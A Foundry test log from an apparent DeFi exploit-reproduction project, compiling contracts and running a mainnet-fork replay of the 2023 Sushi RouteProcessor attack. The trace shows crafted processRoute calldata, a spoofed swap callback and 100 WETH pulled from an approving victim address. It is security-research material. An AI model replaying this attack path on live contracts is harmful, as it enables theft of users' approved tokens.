Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.50s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-04/Sushi_Router_exp.sol:44:5:
   |
44 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Sushi_Router_exp.sol:82:9:
   |
82 |         address recipient,
   |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Sushi_Router_exp.sol:83:9:
   |
83 |         bool zeroForOne,
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Sushi_Router_exp.sol:84:9:
   |
84 |         int256 amountSpecified,
   |         ^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Sushi_Router_exp.sol:85:9:
   |
85 |         uint160 sqrtPriceLimitX96,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-04/Sushi_Router_exp.sol:86:9:
   |
86 |         bytes calldata data
   |         ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.20s (6.66ms CPU time)

Ran 1 test for src/test/2023-04/Sushi_Router_exp.sol:SushiExp
[PASS] testExp() (gas: 80051)
Logs:
  WETH balance before attack: 0

  WETH balance after  attack: 100000000000000000000


Traces:
  [11809] SushiExp::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17007841 [1.7e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(LINK: [0x514910771AF9Ca656af840dff83E8264EcF986CA], "LINK")
    │   └─ ← [Return]
    └─ ← [Stop]

  [85651] SushiExp::testExp()
    ├─ [2534] WETH::balanceOf(SushiExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("WETH balance before attack: %d\n", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [60679] 0x044b75f554b886A065b9567891e45c79542d7357::processRoute(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, 0, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, 0, 0x0000000000000000000000000000000000000000, 0x01514910771af9ca656af840dff83e8264ecf986ca010000017fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000)
    │   ├─ [2655] LINK::balanceOf(0x044b75f554b886A065b9567891e45c79542d7357) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [38607] SushiExp::swap(0x0000000000000000000000000000000000000000, false, 0, 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000514910771af9ca656af840dff83e8264ecf986ca000000000000000000000000044b75f554b886a065b9567891e45c79542d7357)
    │   │   ├─ [32833] 0x044b75f554b886A065b9567891e45c79542d7357::uniswapV3SwapCallback(100000000000000000000 [1e20], 0, 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000031d3243cfb54b34fc9c73e1cb1137124bd6b13e1)
    │   │   │   ├─ [30125] WETH::transferFrom(0x31d3243CfB54B34Fc9C73e1CB1137124bD6B13E1, SushiExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100000000000000000000 [1e20])
    │   │   │   │   ├─ emit Transfer(from: 0x31d3243CfB54B34Fc9C73e1CB1137124bD6B13E1, to: SushiExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 100000000000000000000 [1e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000056bc75e2d63100000
    │   │   │   │   │   @ 0x95f8cd41e2ee220afdea18978164e272fdbc090d8a126b5889281f951ee53f1c: 0x000000000000000000000000000000000000000000000031bf6c99fe99642f23 → 0x00000000000000000000000000000000000000000000002c53a53bd136542f23
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 1
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Return] 0, 0
    │   ├─  storage changes:
    │   │   @ 0: 1 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000056bc75e2d63100000
    │   └─ ← [Return] 0
    ├─ [534] WETH::balanceOf(SushiExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 100000000000000000000 [1e20]
    ├─ [0] console::log("WETH balance after  attack: %d\n", 100000000000000000000 [1e20]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 1: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.32s (6.27s CPU time)

Ran 2 test suites in 9.54s (11.52s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
